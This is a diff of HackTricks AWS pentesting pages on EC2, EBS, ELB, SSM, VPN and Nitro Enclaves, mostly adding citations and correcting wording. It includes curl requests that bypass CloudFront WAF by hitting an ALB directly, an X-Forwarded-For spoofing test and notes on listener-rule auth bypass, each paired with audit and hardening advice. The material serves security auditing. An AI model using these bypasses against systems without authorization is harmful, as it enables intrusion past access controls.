+- [2] [Core components of Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/HowItWorks.CoreComponents.html)
+- [3] [Global tables - multi-active, multi-Region replication](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/GlobalTables.html)
+- [4] [In-memory acceleration with DynamoDB Accelerator (DAX)](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/DAX.html)
+- [5] [DynamoDB encryption at rest usage notes](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/encryption.usagenotes.html)
+- [6] [Backup and restore for DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/Backup-and-Restore.html)
+- [7] [Point-in-time backups for DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/Point-in-time-recovery.html)
+- [8] [Requesting a table export in DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/S3DataExport_Requesting.html)
+- [9] [dynamodb — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/dynamodb/)
+- [10] [Querying tables in DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/Query.html)
+- [11] [Scanning tables in DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/Scan.html)
+- [12] [Condition - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html)
+- [13] [Using expressions in DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/Expressions.html)
+- [14] [Scan - Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Scan.html)
+- [15] [PartiQL - a SQL-compatible query language for Amazon DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/ql-reference.html)
+- [16] [Getting started with PartiQL for DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/ql-gettingstarted.html)
+- [17] [Using expression attribute values in DynamoDB](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/Expressions.ExpressionAttributeValues.html)
+- [18] [ScanSpec (AWS SDK for Java)](https://docs.aws.amazon.com/AWSJavaSDK/latest/javadoc/com/amazonaws/services/dynamodbv2/document/spec/ScanSpec.html)
+- [19] [DynamoDB Local for Desktop Development](https://aws.amazon.com/blogs/aws/dynamodb-local-for-desktop-development/)
+- [20] [dynalite README](https://github.com/mhart/dynalite)
+- [21] [localstack/localstack README](https://github.com/localstack/localstack)
+- [22] [aaronshaf/dynamodb-admin README](https://github.com/aaronshaf/dynamodb-admin)
+- [23] [Creating backups of DynamoDB tables with AWS Backup](https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/CreateBackupAWS.html)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
@@ -1,7 +1,5 @@
 # AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## VPC & Networking
 
 Learn what a VPC is and about its components in:
@@ -12,7 +10,7 @@ aws-vpc-and-networking-basic-information.md
 
 ## EC2
 
-Amazon EC2 is utilized for initiating **virtual servers**. It allows for the configuration of **security** and **networking** and the management of **storage**. The flexibility of Amazon EC2 is evident in its ability to scale resources both upwards and downwards, effectively adapting to varying requirement changes or surges in popularity. This feature diminishes the necessity for precise traffic predictions.
+Amazon EC2 provides resizable virtual compute instances. It supports configurable networking, security, and storage, and lets workloads change instance capacity as requirements change.<sup>[[24]](#references)</sup>
 
 Interesting things to enumerate in EC2:
 
@@ -29,13 +27,13 @@ Interesting things to enumerate in EC2:
 
 ### Instance Profiles
 
-Using **roles** to grant permissions to applications that run on **EC2 instances** requires a bit of extra configuration. An application running on an EC2 instance is abstracted from AWS by the virtualized operating system. Because of this extra separation, you need an additional step to assign an AWS role and its associated permissions to an EC2 instance and make them available to its applications.
+Using **roles** to grant permissions to applications that run on **EC2 instances** requires a bit of extra configuration. An application running on an EC2 instance is abstracted from AWS by the virtualized operating system. Because of this extra separation, you need an additional step to assign an AWS role and its associated permissions to an EC2 instance and make them available to its applications.<sup>[[7]](#references)</sup>
 
-This extra step is the **creation of an** [_**instance profile**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) attached to the instance. The **instance profile contains the role and** can provide the role's temporary credentials to an application that runs on the instance. Those temporary credentials can then be used in the application's API calls to access resources and to limit access to only those resources that the role specifies. Note that **only one role can be assigned to an EC2 instance** at a time, and all applications on the instance share the same role and permissions.
+This extra step is the **creation of an** [_**instance profile**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) attached to the instance. The **instance profile contains the role and** can provide the role's temporary credentials to an application that runs on the instance. Those temporary credentials can then be used in the application's API calls to access resources and to limit access to only those resources that the role specifies. Note that **only one role can be assigned to an EC2 instance** at a time, and all applications on the instance share the same role and permissions.<sup>[[7]](#references)[[8]](#references)</sup>
 
 ### Metadata Endpoint
 
-AWS EC2 metadata is information about an Amazon Elastic Compute Cloud (EC2) instance that is available to the instance at runtime. This metadata is used to provide information about the instance, such as its instance ID, the availability zone it is running in, the IAM role associated with the instance, and the instance's hostname.
+AWS EC2 metadata is information about an Amazon Elastic Compute Cloud (EC2) instance that is available to the instance at runtime. This metadata is used to provide information about the instance, such as its instance ID, the availability zone it is running in, the IAM role associated with the instance, and the instance's hostname.<sup>[[9]](#references)</sup>
 
 {{#ref}}
 https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html
@@ -154,13 +152,13 @@ In the following page you can check how to **abuse EC2 permissions to escalate p
 
 ## EBS
 
-Amazon **EBS** (Elastic Block Store) **snapshots** are basically static **backups** of AWS EBS volumes. In other words, they are **copies** of the **disks** attached to an **EC2** Instance at a specific point in time. EBS snapshots can be copied across regions and accounts, or even downloaded and run locally.
+Amazon **EBS** (Elastic Block Store) **snapshots** are basically static **backups** of AWS EBS volumes. In other words, they are **copies** of the **disks** attached to an **EC2** Instance at a specific point in time. EBS snapshots can be copied across regions and accounts; their data can be accessed through EBS direct APIs or by creating a volume from the snapshot and transferring files.<sup>[[16]](#references)[[17]](#references)[[18]](#references)</sup>
 
 Snapshots can contain **sensitive information** such as **source code or APi keys**, therefore, if you have the chance, it's recommended to check it.
 
 ### Difference AMI & EBS
 
-An **AMI** is used to **launch an EC2 instance**, while an EC2 **Snapshot** is used to **backup and recover data stored on an EBS volume**. While an EC2 Snapshot can be used to create a new AMI, it is not the same thing as an AMI, and it does not include information about the operating system, application server, or other software required to run an application.
+An **AMI** is a launch template for EC2 instances that includes configuration metadata and references to one or more backing snapshots. An EBS **snapshot** is a block-level backup of one volume; a root-volume snapshot can contain an operating system and installed software, but it does not by itself contain the complete AMI launch configuration.<sup>[[16]](#references)[[19]](#references)</sup>
 
 ### Privesc
 
@@ -172,11 +170,9 @@ In the following page you can check how to **abuse EBS permissions to escalate p
 
 ## SSM
 
-**Amazon Simple Systems Manager (SSM)** allows to remotely manage floats of EC2 instances to make their administrations much more easy. Each of these instances need to be running the **SSM Agent service as the service will be the one getting the actions and performing them** from the AWS API.
+**AWS Systems Manager (SSM)** can remotely manage fleets of EC2 instances and other managed nodes. On each managed node, **SSM Agent** processes requests from the Systems Manager service and runs them as specified.<sup>[[10]](#references)</sup>
 
-**SSM Agent** makes it possible for Systems Manager to update, manage, and configure these resources. The agent **processes requests from the Systems Manager service in the AWS Cloud**, and then runs them as specified in the request.
-
-The **SSM Agent comes**[ **preinstalled in some AMIs**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html) or you need to [**manually install them**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html) on the instances. Also, the IAM Role used inside the instance needs to have the policy **AmazonEC2RoleforSSM** attached to be able to communicate.
+The **SSM Agent comes**[ **preinstalled in some AMIs**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html) or you need to [**manually install them**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html) on the instances. For the instance-profile setup, attach the AWS managed policy **AmazonSSMManagedInstanceCore** (or an equivalent custom policy) so the agent can communicate with Systems Manager.<sup>[[11]](#references)[[12]](#references)[[13]](#references)</sup>
 
 ### Enumeration
 
@@ -213,11 +209,13 @@ In the following page you can check how to **abuse SSM permissions to achieve pe
 
 ## ELB
 
-**Elastic Load Balancing** (ELB) is a **load-balancing service for Amazon Web Services** (AWS) deployments. ELB automatically **distributes incoming application traffic** and scales resources to meet traffic demands.
+**Elastic Load Balancing** (ELB) automatically **distributes incoming application traffic** across registered targets and scales its load-balancing capacity as traffic changes; scaling the backend targets themselves requires a separate mechanism such as EC2 Auto Scaling.<sup>[[2]](#references)</sup>
 
-For **Application Load Balancers (ALBs)**, the listener rules, authentication actions, header handling, and the alternative paths to the same targets are part of the **security boundary**. Review the full path **CloudFront --> ALB/NLB --> listeners --> rules --> target groups --> instances/IPs/ports/security groups**, not only one listener rule in isolation.
+For **Application Load Balancers (ALBs)**, the listener rules, authentication actions, header handling, and the alternative paths to the same targets are part of the **security boundary**. Review the full path **CloudFront --> ALB/NLB --> listeners --> rules --> target groups --> instances/IPs/ports/security groups**, not only one listener rule in isolation.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ### Enumeration
+
+The ELBv2 API provides operations for listing load balancers, listeners, rules, target groups, target health, and load-balancer attributes.<sup>[[14]](#references)</sup>
 
 ```bash
 # List internet-facing ELBs
@@ -238,7 +236,7 @@ aws elbv2 describe-load-balancer-attributes --load-balancer-arn <load_balancer_a
 
 #### CloudFront / WAF bypass via direct ALB origin access
 
-If a **CloudFront** distribution fronts an **internet-facing ALB** but the ALB security group still allows public inbound traffic, an attacker can often **request the ALB DNS name directly** and bypass **CloudFront WAF, geo restrictions, rate limits, and cache-layer controls**.
+If a **CloudFront** distribution fronts an **internet-facing ALB** but the ALB security group still allows public inbound traffic, an attacker can often **request the ALB DNS name directly** and bypass **CloudFront WAF, geo restrictions, rate limits, and cache-layer controls**.<sup>[[2]](#references)</sup>
 
 ```bash
 # Test the origin directly
@@ -250,55 +248,55 @@ curl -isk https://<alb-dns-name>/ -H 'Host: app.example.com'
 
 **Audit notes:**
 
-- Enumerate CloudFront distributions and their origins, then check whether the origin ALB is still **internet-facing**.
-- Review the ALB **security groups**. If inbound traffic is allowed from `0.0.0.0/0` or broad CIDRs, CloudFront is probably not the only reachable path.
-- A direct **non-error** response from the ALB usually means the CloudFront/WAF layer is bypassable.
+- Enumerate CloudFront distributions and their origins, then check whether the origin ALB is still **internet-facing**.<sup>[[2]](#references)</sup>
+- Review the ALB **security groups**. If inbound traffic is allowed from `0.0.0.0/0` or broad CIDRs, CloudFront is probably not the only reachable path.<sup>[[2]](#references)</sup>
+- A direct **non-error** response from the ALB usually means the CloudFront/WAF layer is bypassable.<sup>[[2]](#references)</sup>
 
-**Hardening:** If CloudFront should be the only entry point, allow inbound traffic to the ALB only from the AWS-managed prefix list **`com.amazonaws.global.cloudfront.origin-facing`**.
+**Hardening:** Prefer a private ALB through CloudFront VPC origins when supported. For an internet-facing ALB, require a secret custom origin header at the listener and restrict the security group to the AWS-managed prefix list **`com.amazonaws.global.cloudfront.origin-facing`**. The prefix list alone permits origin-facing traffic from CloudFront generally, so use it as an additional network restriction rather than the sole authorization control.<sup>[[5]](#references)[[25]](#references)[[26]](#references)</sup>
 
 #### Listener rule shadowing / auth bypass
 
-ALB rules are evaluated in **ascending priority order**. A **broader** rule with a **lower priority number** can capture traffic before a restrictive rule with `authenticate-oidc`, `authenticate-cognito`, or `source-ip` is ever reached.
+ALB rules are evaluated in **ascending priority order**. A **broader** rule with a **lower priority number** can capture traffic before a restrictive rule with `authenticate-oidc`, `authenticate-cognito`, or `source-ip` is ever reached.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ```text
 [10] path /*       -> forward -> tg-app
 [20] path /admin*  -> authenticate-oidc -> tg-app
 ```
 
-A request to `/admin` matches `/*` first, so the authentication action never runs.
+A request to `/admin` matches `/*` first, so the authentication action never runs.<sup>[[2]](#references)[[3]](#references)</sup>
 
 **Audit notes:**
 
-- Dump every listener and rule with `aws elbv2 describe-rules --listener-arn <listener_arn>`.
-- Walk rules in ascending priority order and check whether a broad **host/path/header/query** condition matches traffic that should have hit a more restrictive rule first.
-- Treat listener ordering like middleware ordering: **first matching rule wins**.
+- Dump every listener and rule with `aws elbv2 describe-rules --listener-arn <listener_arn>`.<sup>[[3]](#references)[[14]](#references)</sup>
+- Walk rules in ascending priority order and check whether a broad **host/path/header/query** condition matches traffic that should have hit a more restrictive rule first.<sup>[[3]](#references)</sup>
+- Treat listener ordering like middleware ordering: **first matching rule wins**.<sup>[[3]](#references)</sup>
 
 #### `source-ip` restrictions can be bypassed through alternate paths
 
-A `source-ip` condition only protects the **specific listener rule** where it is configured. If the **same target group**, the **same backend IPs/instances**, or the **same service on another port** is reachable through another ALB, another listener, or an NLB with weaker controls, the IP allowlist can often be bypassed by using that alternate path.
+A `source-ip` condition only protects the **specific listener rule** where it is configured. If the **same backend IPs or instances**, or the **same service on another port**, is reachable through another listener, another load balancer, or directly with weaker controls, the IP allowlist can often be bypassed through that alternate path.<sup>[[2]](#references)[[3]](#references)[[15]](#references)</sup>
 
 **Audit notes:**
 
-- For each restrictive rule, enumerate the **target group ARN** and the registered targets.
-- Compare those targets against **all other listeners/load balancers** in the account/region.
-- Also check for direct exposure via **public instance IPs**, permissive **security groups**, or additional listeners on ports such as `80`, `443`, `8080`, or `8443`.
+- For each restrictive rule, enumerate the **target group ARN** and the registered targets.<sup>[[2]](#references)[[14]](#references)[[15]](#references)</sup>
+- Compare the registered backend addresses and ports against **all other listeners, load balancers, and direct network paths** in the account and Region.<sup>[[2]](#references)</sup>
+- Also check for direct exposure via **public instance IPs**, permissive **security groups**, or additional listeners on ports such as `80`, `443`, `8080`, or `8443`.<sup>[[2]](#references)</sup>
 
-A good mental model is: **protect the target, not only one route to the target**.
+A good mental model is: **protect the target, not only one route to the target**.<sup>[[2]](#references)</sup>
 
 #### Client-controlled `X-Forwarded-For` trust
 
-If `routing.http.xff_header_processing.mode` is set to **`preserve`** on an **internet-facing ALB**, the backend can receive an **attacker-supplied** `X-Forwarded-For` value unchanged. If the application trusts that header for **access control**, **rate limiting**, **logging**, or **monitoring**, the attacker may spoof the perceived client IP.
+If `routing.http.xff_header_processing.mode` is set to **`preserve`** on an **internet-facing ALB**, the backend can receive an **attacker-supplied** `X-Forwarded-For` value unchanged. If the application trusts that header for **access control**, **rate limiting**, **logging**, or **monitoring**, the attacker may spoof the perceived client IP.<sup>[[2]](#references)[[4]](#references)</sup>
 
 ```bash
 curl -isk https://<alb-dns-name>/ -H 'X-Forwarded-For: 127.0.0.1'
 aws elbv2 describe-load-balancer-attributes --load-balancer-arn <load_balancer_arn>
 ```
 
-Prefer `append` or `remove` on internet-facing ALBs, and avoid using client-controlled forwarding headers as an authorization primitive.
+Prefer `append` or `remove` on internet-facing ALBs, and avoid using client-controlled forwarding headers as an authorization primitive.<sup>[[2]](#references)[[4]](#references)</sup>
 
 #### Useful tool
 
-[**ELBaph**](https://github.com/doyensec/ELBaph) is a read-only auditor that models **ALBs, NLBs, listeners, rules, target groups, and targets as a routing graph** and then probes for reachable exposures.
+[**ELBaph**](https://github.com/doyensec/ELBaph) is a read-only auditor that models **ALBs, NLBs, listeners, rules, target groups, and targets as a routing graph** and then probes for reachable exposures.<sup>[[6]](#references)[[2]](#references)</sup>
 
 ```bash
 elbaph scan --region us-east-1
@@ -326,7 +324,7 @@ aws autoscaling describe-load-balancers
 
 ## Nitro
 
-AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture.
+AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture.<sup>[[20]](#references)</sup>
 
 Get more information and how to enumerate it from:
 
@@ -336,7 +334,7 @@ aws-nitro-enum.md
 
 ## VPN
 
-A VPN allows to connect your **on-premise network (site-to-site VPN)** or the **workers laptops (Client VPN)** with a **AWS VPC** so services can accessed without needing to expose them to the internet.
+A VPN allows to connect your **on-premise network (site-to-site VPN)** or the **workers laptops (Client VPN)** with a **AWS VPC** so services can accessed without needing to expose them to the internet.<sup>[[21]](#references)[[22]](#references)</sup>
 
 #### Basic AWS VPN Components
 
@@ -344,26 +342,28 @@ A VPN allows to connect your **on-premise network (site-to-site VPN)** or the **
    - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection.
    - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection.
    - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway.
-   - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges.
+   - It serves as a reference point for setting up the VPN connection.<sup>[[21]](#references)</sup>
 2. **Virtual Private Gateway**:
    - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection.
    - It is attached to your VPC and serves as the target for your VPN connection.
    - VPG is the AWS side endpoint for the VPN connection.
-   - It handles the secure communication between your VPC and your on-premises network.
+   - It handles the secure communication between your VPC and your on-premises network.<sup>[[21]](#references)</sup>
 3. **Site-to-Site VPN Connection**:
    - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel.
    - This type of connection requires a Customer Gateway and a Virtual Private Gateway.
    - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment.
-   - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection.
+   - Typically used for regular, long-term connections and is billed per connection-hour plus data transfer charges.<sup>[[21]](#references)[[23]](#references)</sup>
 4. **Client VPN Endpoint**:
    - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions.
    - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network.
    - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks.
-   - With Client VPN, each client device uses a VPN client software to establish a secure connection.
+   - With Client VPN, each client device uses a VPN client software to establish a secure connection.<sup>[[22]](#references)</sup>
 
 You can [**find more information about the benefits and components of AWS VPNs here**](aws-vpc-and-networking-basic-information.md#vpn).
 
 ### Enumeration
+
+The AWS CLI exposes operations for inspecting Client VPN endpoints, target networks, routes, authorization rules, active connections, and Site-to-Site VPN gateways/connections.<sup>[[21]](#references)[[22]](#references)</sup>
 
 ```bash
 # VPN endpoints
@@ -409,15 +409,31 @@ If a **VPN connection was stablished** you should search for **`.opvn`** config 
 
 ## References
 
-- [AWS Elastic Beanstalk and Amazon EC2 getting started](https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html)
-- [Doyensec - Navigating Lax Load Balancers: When an Intersection Gets You Inside](https://blog.doyensec.com/2026/05/25/cloudsectidbits-elbaph-alb.html)
-- [AWS - Listener rules for your Application Load Balancer](https://docs.aws.amazon.com/elasticloadbalancing/latest/application/listener-rules.html)
-- [AWS - HTTP headers and Application Load Balancers](https://docs.aws.amazon.com/elasticloadbalancing/latest/application/x-forwarded-headers.html)
-- [AWS - CloudFront managed prefix list for origin-facing servers](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/LocationsOfEdgeServers.html)
-- [Doyensec - ELBaph](https://github.com/doyensec/ELBaph)
+- [1] [Getting started with Amazon EC2 orchestration using the Wizard - AWS Batch](https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html)
+- [2] [Doyensec - Navigating Lax Load Balancers: When an Intersection Gets You Inside](https://blog.doyensec.com/2026/05/25/cloudsectidbits-elbaph-alb.html)
+- [3] [Listener rules for your Application Load Balancer - Elastic Load Balancing](https://docs.aws.amazon.com/elasticloadbalancing/latest/application/listener-rules.html)
+- [4] [HTTP headers and Application Load Balancers - Elastic Load Balancing](https://docs.aws.amazon.com/elasticloadbalancing/latest/application/x-forwarded-headers.html)
+- [5] [Locations and IP address ranges of CloudFront edge servers - Amazon CloudFront](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/LocationsOfEdgeServers.html)
+- [6] [ELBaph - AWS Elastic Load Balancer Configuration Auditor](https://github.com/doyensec/ELBaph)
+- [7] [IAM roles for Amazon EC2 - Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html)
+- [8] [Use instance profiles - AWS Identity and Access Management](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html)
+- [9] [Use instance metadata to manage your EC2 instance - Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)
+- [10] [Working with SSM Agent - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/ssm-agent.html)
+- [11] [Find AMIs with the SSM Agent preinstalled - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html)
+- [12] [Manually installing and uninstalling SSM Agent on EC2 instances for Linux - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html)
+- [13] [Configure instance permissions required for Systems Manager - AWS Systems Manager](https://docs.aws.amazon.com/systems-manager/latest/userguide/setup-instance-permissions.html)
+- [14] [elbv2 - AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elbv2/)
+- [15] [Target groups for your Application Load Balancers - Elastic Load Balancing](https://docs.aws.amazon.com/elasticloadbalancing/latest/application/load-balancer-target-groups.html)
+- [16] [Create Amazon EBS snapshots - Amazon EBS](https://docs.aws.amazon.com/ebs/latest/userguide/ebs-creating-snapshot.html)
+- [17] [Copy an Amazon EBS snapshot - Amazon EBS](https://docs.aws.amazon.com/ebs/latest/userguide/ebs-copy-snapshot.html)
+- [18] [Create an inventory of your EBS volumes - Amazon EBS](https://docs.aws.amazon.com/ebs/latest/userguide/ebs-data-inventory.html)
+- [19] [AMI types and characteristics in Amazon EC2 - Amazon Elastic Compute Cloud](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ComponentsAMIs.html)
+- [20] [AWS Nitro System](https://aws.amazon.com/ec2/nitro/)
+- [21] [How AWS Site-to-Site VPN works - AWS Site-to-Site VPN](https://docs.aws.amazon.com/vpn/latest/s2svpn/how_it_works.html)
+- [22] [How AWS Client VPN works - AWS Client VPN](https://docs.aws.amazon.com/vpn/latest/clientvpn-admin/how-it-works.html)
+- [23] [AWS VPN Pricing](https://aws.amazon.com/vpn/pricing/)
+- [24] [What is Amazon EC2?](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html)
+- [25] [Restrict access to Application Load Balancers](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/restrict-access-to-load-balancer.html)
+- [26] [Restrict access with VPC origins](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/private-content-vpc-origins.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md
@@ -1,21 +1,19 @@
 # AWS - Nitro Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture.
+AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture.<sup>[[3]](#references)[[21]](#references)</sup>
 
 ### Nitro Enclaves
 
-**AWS Nitro Enclaves** provides a secure, **isolated compute environment within Amazon EC2 instances**, specifically designed for processing highly sensitive data. Leveraging the AWS Nitro System, these enclaves ensure robust **isolation and security**, ideal for **handling confidential information** such as PII or financial records. They feature a minimalist environment, significantly reducing the risk of data exposure. Additionally, Nitro Enclaves support cryptographic attestation, allowing users to verify that only authorized code is running, crucial for maintaining strict compliance and data protection standards.
+**AWS Nitro Enclaves** provides a secure, **isolated compute environment within Amazon EC2 instances**, specifically designed for processing highly sensitive data. Leveraging the AWS Nitro System, these enclaves ensure robust **isolation and security**, ideal for **handling confidential information** such as PII or financial records. They feature a minimalist environment, significantly reducing the risk of data exposure. Additionally, Nitro Enclaves support cryptographic attestation, allowing users to verify that only authorized code is running, crucial for maintaining strict compliance and data protection standards.<sup>[[4]](#references)</sup>
 
 > [!CAUTION]
 > Nitro Enclave images are **run from inside EC2 instances** and you cannot see from the AWS web console if an EC2 instances is running images in Nitro Enclave or not.
 
 ## Nitro Enclave CLI installation
 
-Follow the all instructions [**from the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave). However, these are the most important ones:
+Follow the complete [**installation instructions**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave). The main steps are:<sup>[[2]](#references)[[5]](#references)</sup>
 
 ```bash
 # Install tools
@@ -35,7 +33,7 @@ sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable n
 
 ## Nitro Enclave Images
 
-The images that you can run in Nitro Enclave are based on docker images, so you can create your Nitro Enclave images from docker images like:
+The images that you can run in Nitro Enclave are based on docker images, so you can create your Nitro Enclave images from docker images like:<sup>[[6]](#references)</sup>
 
 ```bash
 # You need to have the docker image accesible in your running local registry
@@ -43,7 +41,7 @@ The images that you can run in Nitro Enclave are based on docker images, so you 
 nitro-cli build-enclave --docker-uri <docker-img>:<tag> --output-file nitro-img.eif
 ```
 
-As you can see the Nitro Enclave images use the extension **`eif`** (Enclave Image File).
+As you can see the Nitro Enclave images use the extension **`eif`** (Enclave Image File).<sup>[[6]](#references)</sup>
 
 The output will look similar to:
 
@@ -62,16 +60,16 @@ Enclave Image successfully created.
 
 ### Run an Image
 
-As per [**the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave), in order to run an enclave image you need to assign it memory of **at least 4 times the size of the `eif` file**. It's possible to configure the default resources to give to it in the file
+The linked workshop uses memory sized to **at least four times the `eif` file** for its exercise, but this is not a general Nitro CLI minimum. The current CLI contract requires at least 64 MiB and enough memory for the enclave workload, while leaving sufficient memory on the parent instance.<sup>[[2]](#references)[[8]](#references)</sup> The resources reserved for enclaves are configured in:
 
 ```shell
 /etc/nitro_enclaves/allocator.yaml
 ```
 
 > [!CAUTION]
-> Always remember that you need to **reserve some resources for the parent EC2** instance also!
+> Always remember that you need to **reserve some resources for the parent EC2** instance also!<sup>[[8]](#references)</sup>
 
-After knowing the resources to give to an image and even having modified the configuration file it's possible to run an enclave image with:
+After knowing the resources to give to an image and even having modified the configuration file it's possible to run an enclave image with:<sup>[[8]](#references)</sup>
 
 ```shell
 # Restart the service so the new default values apply
@@ -83,13 +81,13 @@ nitro-cli run-enclave --cpu-count 2 --memory 3072 --eif-path hello.eif --debug-m
 
 ### Enumerate Enclaves
 
-If you compromise and EC2 host it's possible to get a list of running enclave images with:
+With command execution on the parent EC2 instance and sufficient local privileges, list its running enclaves with:<sup>[[9]](#references)</sup>
 
 ```bash
 nitro-cli describe-enclaves
 ```
 
-It's **not possible to get a shell** inside a running enclave image because thats the main purpose of enclave, however, if you used the parameter **`--debug-mode`**, it's possible to get the **stdout** of it with:
+Nitro Enclaves expose no SSH or general interactive-login mechanism. An enclave launched with **`--debug-mode`** does expose a **read-only console**, which can be opened with:<sup>[[4]](#references)[[10]](#references)</sup>
 
 ```shell
 ENCLAVE_ID=$(nitro-cli describe-enclaves | jq -r ".[0].EnclaveID")
@@ -98,7 +96,7 @@ nitro-cli console --enclave-id ${ENCLAVE_ID}
 
 ### Terminate Enclaves
